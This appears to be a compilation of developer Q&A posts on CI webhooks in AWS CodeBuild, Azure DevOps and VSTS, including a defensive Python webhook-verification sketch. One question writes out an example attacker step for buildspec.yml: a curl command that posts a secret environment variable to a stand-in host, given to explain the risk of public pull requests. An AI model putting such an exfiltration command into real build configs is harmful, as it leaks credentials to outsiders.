AWS CodeBuild - Get Webhook Body in buildspec.yml - github

If I have a build that is triggered by a GitHub webhook in AWS CodeBuild, is there a way for me to inspect the content of the webhook body that triggered the build from my buildspec.yml file? Or is this content just lost?

In order to trigger a CodeBuild build from GitHub, you're going to need to be able to consume POST data from GitHub and translate that into a call to CodeBuild. In that translation layer, just take what you need from the webhook and apply it to your CodeBuild build environment. One of the ways you can pass data into your CodeBuild build is through environment variables. I am not sure how you intend to trigger CodeBuild builds, but I assume you would need a translation layer that consumes the webhook and ultimately launches a CodeBuild build.

This is not supported today. Providing the webhook payload as a preconfigured environment variable is a feature request the CodeBuild team is aware of. Relevant forum post here: https://forums.aws.amazon.com/thread.jspa?threadID=269699
Outside of buildspec, you could achieve this by looking at the "initiator" field of your CodeBuild console/UI or BatchGetBuilds API response. This will give the GitHub hookshot id which you may then use to look up your webhook payload in GitHub.

Related

Azure DevOps GitHub webhooks

We had an Azure pipeline which used to work, but recently the PR triggers are not working.
Hence, I deleted the webhooks from the GitHub repo. I created a new service account and a new pipeline with the new service account. However, it does not seem to recreate the webhooks in GitHub.
Any thoughts?
Which model are you using, classic editor build or YAML build?
If you are using YAML build, we could select GitHub as source.
And we could specify the target branches when validating your pull requests. For example, to validate pull requests that target master and releases/*, you can use the following pr trigger.
pr:
- master
- releases/*
If you are using a classic editor build, we could select the Pull request validation trigger and check the Enable pull request validation check box to enable builds on pull requests. Check the pic below.
We could refer to this doc for more details.

Automatically adding comments to all Pull Requests in Azure DevOps

Is there a way to automatically add comments to any pull requests created in Azure DevOps within a repository?
Is there a way to automatically add comments to any pull requests created in Azure DevOps within a repository?
I am afraid there is no such way to automatically add comments to any pull requests created in Azure DevOps within a repository.
That is because we are currently unable to monitor the creation of pull requests in real time, and there is no similar extension to detect the creation of pull requests. In this case, we could set up an action to add a comment to all pull requests.
To achieve this, we could try to add a Build Validation for each branch, and use the REST API Pull Request Thread Comments - Create to add comments to the pull requests.
POST https://dev.azure.com/{organization}/{project}/_apis/git/repositories/{repositoryId}/pullRequests/{pullRequestId}/threads/{threadId}/comments?api-version=5.1
You could check this thread for detailed info about how to use this REST API.
In this case, if we create any pull request, it will invoke the Build Validation to use REST API to add comments to the pull request.
Our team had similar needs so I created an Azure DevOps task to do just that:
PR Auto-Comment (GitHub)
Just add the task to your PR build and you're good to go.
Depending on your exact need, you may be able to use the "Automatically included reviewers" functionality that you get with branch policy. It has a custom message that can be configured to be included in every PR.

How would I go about setting up a web hook listener on Azure DevOps?

Goal:
We have a Translation Management System project with a set of string translations, which can be exported as iOS, Android, and web formats. This can be done via its API, CLI, or manually with the UI. We need to integrate with our git-based repository, which lives in DevOps, so that when changes are made to the TMS translations, the code base is updated automatically (preferably a PR would be created with the changes).
What I Have Tried:
I am a mobile developer with little web hook experience, but it seems that they are the key to the solution. I can configure the web hook on the TMS side, but need to provide a URL with a listener. Going through the Azure DevOps service hooks settings and reading documentation extensively, I can't find any leads on a way to set up a custom listener to subscribe to another service's web hook, consume its payload, and trigger an action in DevOps.
I'm aware this may be limited by the capabilities of the TMS and DevOps, but how would this be tackled viewing it from a high level perspective? It doesn't seem like there's any built-in solution, so what would a custom solution entail? If something along the lines of what I'm looking for isn't possible, I would like to know that as well.
Thanks in advance!
"So that when changes are made to the TMS translations, the code base is updated automatically (preferably a PR would be created with the changes)."
Sorry, but as far as I know it's not a supported scenario in Azure DevOps Service.
1. The service hooks option in Azure DevOps Service is that when something (an event) happens in Azure DevOps Service, it runs a task (action) on the target service. But what you want is that when something happens in an external service, it runs a task (action) in Azure DevOps Service. For now this behavior is not supported.
2. Different services in Service Hooks have different supported actions. Let's take the Jenkins service (one service hook) as an example; see step 5 in trigger Jenkins: Azure DevOps can trigger a Jenkins build.
As for Web Hooks (another service hook), it can't trigger actions like updating the code base automatically. It just sends the JSON representation.
So the scenario you want is not supported for now by Azure DevOps Service.
In addition: not sure about how your TMS works, but you can consider using the Azure DevOps REST API to trigger actions in Azure DevOps Service. (These REST APIs can be used to queue a build or release or to do git-related actions.)
When changes are made to your TMS translations, you may call the corresponding Azure DevOps REST API to manage git repos in Azure DevOps, if your TMS supports this kind of behavior.
Hope all of the above resolves your puzzle as to why your scenario is not supported by Web Hooks in Azure DevOps :)
When you authorize your GitHub repo through the DevOps settings, a webhook will be automatically created on your repo with configurable hook events.

Prevent GitHub PR checks running without manual intervention

I have run into a situation where I have a repo on GitHub that I am looking to make public.
Currently, one of the PR checks runs CI tests on AWS CodeBuild.
Because of the nature of the tests, there are environment variables that contain secrets. The results/logs from the build output will not be public, which is one good thing.
AWS CodeBuild uses the buildspec.yml file to run commands in CI.
If I were to have an environment variable, for example $SECRET_THING, an attacker would be able to simply open a PR, adding to buildspec.yml, for example:
- curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
Which would then send themselves the secret.
Using either a setting in GitHub, the GitHub checks API or CodeBuild, is there a way that would require manual intervention to run the check, preferably after a code review? (eg. a button clickable only by an authorised collaborator on the PR page)
Don't use plain text environment variables; instead use "env > parameter-store" to store your secret. If you are using CodeBuild's console UI you can create the parameter store entry from "advanced > environment variables > type: parameter store". https://aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax
Also, CodeBuild allows you to define the buildspec as part of the project. This way the buildspec yml file is not present in your repository.
Note: CodeBuild only allows the repo owner or an admin to create the webhook.
Update: @Chris, CodeBuild supports filter groups for PR builds. Documentation: https://docs.aws.amazon.com/codebuild/latest/userguide/sample-github-pull-request.html#sample-github-pull-request-filter-webhook-events-console. You can filter on the actor to ensure that only trusted collaborators can trigger a build for PR or push events.
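As an added example that is not part of any post above, a Python sketch of the "translation layer" the first question's answer describes, extended with the actor restriction this answer recommends: it verifies GitHub's delivery signature, refuses to start a build for accounts outside an allowlist, and forwards only the webhook fields the buildspec needs as environment-variable overrides for the CodeBuild StartBuild call. The webhook secret, the allowlist, the variable names and the sample payload are constructed assumptions.

```python
import hmac
import hashlib
import json
from typing import Optional

WEBHOOK_SECRET = b"constructed-webhook-secret"   # assumption: the secret configured on the GitHub hook
TRUSTED_ACTORS = {"trusted-dev", "release-bot"}  # assumption: collaborators allowed to start builds
BUILD_ACTIONS = {"opened", "synchronize", "reopened"}

def sample_body(sender: str, action: str = "opened") -> bytes:
    """Constructed pull_request event body, trimmed to the fields read below."""
    return json.dumps({
        "action": action,
        "number": 42,
        "pull_request": {"head": {"sha": "0123abcd", "ref": "feature/x"}},
        "repository": {"full_name": "example-org/example-repo"},
        "sender": {"login": sender},
    }).encode()

def sign(secret: bytes, body: bytes) -> str:
    """Value GitHub sends in X-Hub-Signature-256: sha256=<hex HMAC-SHA256 of the raw body>."""
    return "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()

def verify_signature(secret: bytes, body: bytes, header: Optional[str]) -> bool:
    """Constant-time check of the delivery signature before trusting any field of the body."""
    return hmac.compare_digest(sign(secret, body), header or "")

def build_params(body: bytes, header: Optional[str], project_name: str) -> Optional[dict]:
    """Translate a verified webhook into StartBuild parameters; None means 'do not build'.
    In a real handler the result is passed to boto3.client("codebuild").start_build(**params)."""
    if not verify_signature(WEBHOOK_SECRET, body, header):
        return None
    event = json.loads(body)
    if event.get("action") not in BUILD_ACTIONS:
        return None
    if event["sender"]["login"] not in TRUSTED_ACTORS:  # untrusted actor: no build, so no secret exposure
        return None
    # Forward only the fields the buildspec needs; the full body is far too large for
    # environment variables and nothing inside the build should have to re-parse it.
    return {
        "projectName": project_name,
        "sourceVersion": f"pr/{event['number']}",
        "environmentVariablesOverride": [
            {"name": "PR_NUMBER", "value": str(event["number"]), "type": "PLAINTEXT"},
            {"name": "PR_HEAD_SHA", "value": event["pull_request"]["head"]["sha"], "type": "PLAINTEXT"},
            {"name": "PR_ACTOR", "value": event["sender"]["login"], "type": "PLAINTEXT"},
        ],
    }
```

Inside the build, the forwarded values are then available to buildspec.yml as ordinary environment variables such as $PR_NUMBER; the actor check here is a stand-in for the CodeBuild filter group on actor that the answer points to.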

Trigger Visual Studio Team Services build for a GitHub Pull Request

How do you get VSTS to build when a PR is created in GitHub? I've tried several triggers in the VSTS build like refs/pull/*/merge and refs/pull/*/head. I have a build working when a commit is made to the master branch, but I can't get a build to trigger when a PR is created.
I get the following when a PR is created.
Also, the webhook history shows that a message was successfully posted to VSTS, but the build never starts.
The official Microsoft VSTS GitHub Integration extension now supports this directly.
I think it's the trigger. Try what's described in this blog post.
There is not an easy way to enable this today for PRs. It is on the VSTS feature backlog that we want to address soon.
The way to make it work today would be to do something like: add a webhook to call your own custom service endpoint. Within your service endpoint, you could then call into VSTS to queue a build, and the build would need a step to post success/fail back to GitHub.
In your custom service endpoint, you would need to make sure the user is authorized as a contributor on the GitHub repo.
On the new VSTS UI you can find it in Build Edit -> Triggers: